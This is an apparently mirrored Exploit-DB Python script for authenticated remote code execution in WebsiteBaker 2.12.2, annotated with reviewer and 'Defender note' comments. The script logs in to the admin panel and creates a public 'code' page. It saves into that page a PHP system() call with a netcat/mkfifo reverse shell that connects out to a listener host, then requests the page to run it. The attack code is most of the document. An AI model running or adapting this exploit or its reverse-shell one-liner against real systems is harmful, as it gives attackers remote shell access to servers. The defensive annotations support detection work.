WebsiteBaker 2.12.2 – Remote Code Execution

  • 作者: Enesdex
    日期: 2020-09-29
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/48838/
  • # Exploit Title: WebsiteBaker 2.12.2 - Remote Code Execution
    # Date: 2020-07-04
    # Exploit Author: Selim Enes 'Enesdex' Karaduman
    # Vendor Homepage: https://websitebaker.org/pages/en/home.php
    # Software Link: https://wiki.websitebaker.org/doku.php/downloads
    # Version: 2.12.2
    # Tested on: Windows 10 and Ubuntu 18.04 
    # Note: Start a listener (e.g. netcat) before executing, then provide the listener IP and port
    
    import requests
    import re
    from bs4 import BeautifulSoup
    import sys
    import getopt
    
    # Command-line parsing. -t is the target base URL, -u/-p are the username
    # and password submitted to the back-end login form further down, and
    # -i/--lhost and -l/--lport are the address and port that are later
    # concatenated into the shell command string.
    # NOTE(review): because the script logs in to /admin/ first, what it
    # demonstrates is code execution by an authenticated back-end user, not an
    # unauthenticated flaw.
    options, remainder = getopt.gnu_getopt(sys.argv[1:], 'ht:u:p:i:l:',['lhost=','lport='])
    
    # NOTE(review): the loop body has lost its indentation on this page.
    # Each name below (main_url, usr, passwd, lhost, lport) is bound only when
    # its option is supplied; nothing checks that all of them were given before
    # they are used.
    for opt, arg in options:
    if opt in ('-h'): 
    print('Usage: python exploit.py -t TARGET_URL -u USERNAME -p PASSWORD --lhost LISTENER_IP --lport LISTENER_PORT')
    exit()
    elif opt in ('-t'):
    main_url = arg
    elif opt in ('-u'):
    usr = arg
    elif opt in ('-p'):
    passwd = arg
    elif opt in ('-i', '--lhost'):
    	lhost = arg
    elif opt in ('-l' , '--lport'):
    	lport = arg
    
    # Builds a shell one-liner that ties /bin/sh to an nc connection towards
    # lhost:lport through a FIFO at /tmp/f, then wraps it in a PHP
    # `echo system('...');` statement. lhost and lport are concatenated in
    # as given, with no validation or quoting.
    # Defender note: the command string names /tmp/f, mkfifo, /bin/sh and nc,
    # so a FIFO at /tmp/f and sh/nc processes spawned by the PHP/web-server
    # user (presumably; depends on how PHP is run) are host-side indicators
    # that this content was executed.
    reverse_shell_code = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc"+" "+lhost+" "+lport +" "+">/tmp/f"
    shell_code_eval = "echo system('"+ reverse_shell_code + "');"
    
    
    print("Exploit Author: Selim Enes 'Enesdex' Karaduman" + " " + "@enesdex" + "\n")
    # Fetch the back-end login form and read its hidden inputs by position.
    url = main_url+"/admin/login/index.php"
    req = requests.get(url)
    
    login_page = req.text
    soup = BeautifulSoup(login_page, 'html.parser')
    # The *values* of hidden inputs [1] and [2] are used below as the *names*
    # of the username and password fields, so the form evidently publishes its
    # real field names through hidden inputs.
    username_par = soup.find_all(attrs={"type" : "hidden"})[1]['value']
    password_par = soup.find_all(attrs={"type" : "hidden"})[2]['value']
    # Hidden input [3] is replayed as a name/value pair in the login POST;
    # presumably a per-form token - confirm against the login template.
    # The fixed indices depend on the exact form layout and raise IndexError
    # if the page differs.
    weird_par = soup.find_all(attrs={"type" : "hidden"})[3]['name']
    weird_val = soup.find_all(attrs={"type" : "hidden"})[3]['value']
    
    # Log in to obtain the session cookie.
    # `login_page` is rebound here from the HTML text to a requests.Session.
    login_page = requests.Session()
    
    burp0_url = main_url+"/admin/login/index.php"
    burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    # The POST body replays the scraped field names and token and carries the
    # supplied username and password under those field names.
    burp0_data = {"url": '', "username_fieldname": username_par, "password_fieldname": password_par, weird_par : weird_val, username_par : usr,password_par : passwd, "submit": ''}
    # Redirects are not followed, so the Set-Cookie header read below is the
    # one on the login response itself.
    r = login_page.post(burp0_url, headers=burp0_headers, data=burp0_data,allow_redirects = False)
    
    # Only the first "name=value;" token of the Set-Cookie header is kept.
    # A response without Set-Cookie raises KeyError here; the script does not
    # otherwise check whether the login succeeded.
    # Defender note: everything after this point runs with an authenticated
    # back-end session, so controls on /admin/ (network restriction, strong
    # credentials, login throttling) sit in front of the whole chain.
    cok = r.headers['Set-Cookie']
    cok = cok.split(' ')[0]
    cookie_par = cok.split('=')[0]
    cookie_val = cok.split('=')[1].replace(';','')
    session_cookie = cookie_par + "=" + cookie_val
    
    
    # Load the back-end page list to scrape the hidden input needed by the
    # "add page" form (replayed below as a name/value pair; presumably a form
    # token - confirm).
    url = main_url+"/admin/pages/index.php"
    cookies = {cookie_par : cookie_val}
    req = requests.get(url, cookies=cookies)
    create_page = req.text
    soup = BeautifulSoup(create_page, 'html.parser')
    weird_par1 = soup.find_all(attrs={"type" : "hidden"})[0]['name']
    weird_val1 = soup.find_all(attrs={"type" : "hidden"})[0]['value']
    
    # Create a new page whose section type is "code".
    # `create_page` is rebound from the HTML text to a new session object; the
    # session cookie is passed explicitly on each request instead.
    create_page = requests.session()
    
    burp0_url = main_url+"/admin/pages/add.php"
    burp0_cookies = {cookie_par : cookie_val}
    burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    # Defender note: this leaves a public, top-level page titled
    # "exploit-shell" of type "code" in the page tree. The literal title is a
    # useful indicator for this script, but the more durable signal is a POST
    # to /admin/pages/add.php with type=code from an unexpected account or
    # address.
    burp0_data = {weird_par1: weird_val1, "title": "exploit-shell", "type": "code", "parent": "0", "visibility": "public", "submit": "Add"}
    c = create_page.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
    
    # Reload the page list and look up the new page's id: the value of the
    # <option> element whose text is exactly 'exploit-shell'. Raises
    # IndexError if no such option exists (e.g. the page was not created).
    url = main_url+"/admin/pages/index.php"
    cookies = {cookie_par : cookie_val}
    req = requests.get(url, cookies=cookies)
    find_id = req.text
    soup = BeautifulSoup(find_id, 'html.parser')
    pageid = soup.find_all('option',string='exploit-shell')[0]['value']
    
    # Open the page's modify form and scrape hidden input [3], which is
    # replayed in the save request below (presumably the form token - confirm).
    url = main_url+'/admin/pages/modify.php?page_id='+pageid
    cookies = {cookie_par : cookie_val}
    req = requests.get(url, cookies=cookies)
    add_shellcode = req.text
    soup = BeautifulSoup(add_shellcode, 'html.parser')
    weird_par2 = soup.find_all(attrs={"type" : "hidden"})[3]['name']
    weird_val2 = soup.find_all(attrs={"type" : "hidden"})[3]['value']
    
    # Save the PHP statement built earlier as the content of the code section.
    session = requests.session()
    
    burp0_url = main_url+"/modules/code/save.php"
    burp0_cookies = {cookie_par : cookie_val}
    burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    # section_id is filled with the same value as page_id.
    # Defender note: the content field carries raw PHP. Since the script then
    # requests the public page to run it, the code module presumably executes
    # stored section content when the page is rendered - so permission to edit
    # code sections should be treated as permission to run code on the server,
    # and the module restricted or removed where it is not needed.
    burp0_data = {"page_id": pageid, "section_id": pageid, weird_par2: weird_val2, "content": shell_code_eval}
    a = session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
    
    # Requesting the public page is the step that triggers execution; the
    # response is never inspected.
    # Defender note: in access logs the chain appears as POST
    # /admin/login/index.php, POST /admin/pages/add.php, POST
    # /modules/code/save.php, then GET /pages/exploit-shell.php in quick
    # succession from one client.
    last_req = requests.get(main_url+"/pages/exploit-shell.php", cookies=cookies)